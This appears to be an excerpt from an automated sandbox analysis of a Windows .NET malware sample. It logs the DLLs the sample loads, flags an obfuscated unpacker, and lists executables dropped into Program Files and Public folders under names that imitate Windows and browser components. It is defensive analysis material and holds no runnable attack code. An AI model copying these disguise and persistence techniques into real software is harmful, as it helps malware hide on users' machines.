                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: userenv.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: wbemcomn.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: iphlpapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dnsapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: winnsi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: rasapi32.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: rasman.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: rtutils.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: mswsock.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: winhttp.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: uxtheme.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: winmm.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: winmmbase.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: mmdevapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: devobj.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ksuser.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: avrt.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: audioses.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: powrprof.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: umpdc.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: msacm32.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: midimap.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: edputil.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dwrite.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: windowscodecs.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ntmarta.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDirectory created: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exeJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDirectory created: C:\Program Files\Internet Explorer\a903aeb2e41cb9Jump to behavior
                          Source: zZ1Y43bxxV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: zZ1Y43bxxV.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: zZ1Y43bxxV.exeStatic file information: File size 2615296 > 1048576
                          Source: zZ1Y43bxxV.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x27e000
                          Source: zZ1Y43bxxV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.logat source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2901730818.0000000000F96000.00000004.00000020.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          .NET source code contains potential unpacker
                          Source: zZ1Y43bxxV.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                          Source: zZ1Y43bxxV.exe, 857.cs.Net Code: _736
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9B8B3CB9 push ebx; retf 0_2_00007FFD9B8B3CBA
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9BA9127D push ebx; ret 0_2_00007FFD9BA961DA
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9BA89E10 pushad ; ret 0_2_00007FFD9BA89E11
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9BA8F228 push E8FFFFFFh; retf 0_2_00007FFD9BA8F231
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9BE4C5C9 push ebx; iretd 0_2_00007FFD9BE4C5CA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B78D2A5 pushad ; iretd 1_2_00007FFD9B78D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B972316 push 8B485F92h; iretd 1_2_00007FFD9B97231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B76D2A5 pushad ; iretd 2_2_00007FFD9B76D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B88C445 push ebx; retf 2_2_00007FFD9B88C44A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B952316 push 8B485F94h; iretd 2_2_00007FFD9B95231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B77D2A5 pushad ; iretd 4_2_00007FFD9B77D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B962316 push 8B485F93h; iretd 4_2_00007FFD9B96231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B78D2A5 pushad ; iretd 6_2_00007FFD9B78D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B972316 push 8B485F92h; iretd 6_2_00007FFD9B97231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B77D2A5 pushad ; iretd 8_2_00007FFD9B77D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B962316 push 8B485F93h; iretd 8_2_00007FFD9B96231B
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BA7640C push es; ret 16_2_00007FFD9BA76417
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BA8127D push ebx; ret 16_2_00007FFD9BA861DA
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BA7F225 push E8FFFFFFh; retf 16_2_00007FFD9BA7F231
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BA79E10 pushad ; ret 16_2_00007FFD9BA79E11
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BE3C5C9 push ebx; iretd 16_2_00007FFD9BE3C5CA
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BFB51EB push esp; iretd 16_2_00007FFD9BFB51EC
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BFB5230 push esp; iretd 16_2_00007FFD9BFB5231

                          Persistence and Installation Behavior

                          barindex
                          Drops executable to a common third party application directory
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile written: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exeJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\EBWcxehU.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\rpqvmOyM.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\RrWiEPnK.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\iOGyhUTj.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\XriZMeSE.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\TxdZLwor.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\CidbNaiX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\zeucltSv.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\BtlmWJui.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\ASylWHNt.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\oyzEfRxS.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\GmBsEsrN.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\VDeRaRWG.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\QMyIEiey.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\YXDPTJnw.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\frGXBuRR.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\NkpshHmC.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\jUEFnHBb.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\CzktcvcZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\aEoYYxCd.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\EfGUsIxp.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\cNtGaFop.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\eYPHaYTq.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\FpakjsdS.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\vYOmNlRn.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\iGWfDlte.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\NAfrxSmR.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\rLFDskhr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\urceIxCH.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\nUbffkpH.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\lJFefRJG.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\UhMZMMnD.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\QVVIoUxv.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\ymdvPcsA.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\kdkoYnoN.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\fijXRHyU.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\mpuXdJMF.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\CqMurJJc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\HQmkzWIi.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\xuLckdTj.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\bfAYobhs.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\voDmexRC.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\IaGAqGnL.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\wGHUzQXl.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\LGcbGTIb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\YoKhhehz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\JKpAqWmX.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\Public\UserOOBEBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\jeYWdqhF.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\Public\UserOOBEBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\BtlmWJui.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\nUbffkpH.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\lJFefRJG.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\TxdZLwor.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\CqMurJJc.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\kdkoYnoN.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\QMyIEiey.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\xuLckdTj.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\fijXRHyU.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\CidbNaiX.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\IaGAqGnL.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\FpakjsdS.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\wGHUzQXl.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\CzktcvcZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\rLFDskhr.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\aEoYYxCd.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\QVVIoUxv.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\GmBsEsrN.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\frGXBuRR.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\NkpshHmC.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\EBWcxehU.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\vYOmNlRn.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\mpuXdJMF.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\jeYWdqhF.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\iOGyhUTj.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\eYPHaYTq.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\cNtGaFop.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\LGcbGTIb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\ASylWHNt.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\rpqvmOyM.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\iGWfDlte.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\YXDPTJnw.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\HQmkzWIi.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\ymdvPcsA.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\oyzEfRxS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\XriZMeSE.logJump to dropped file
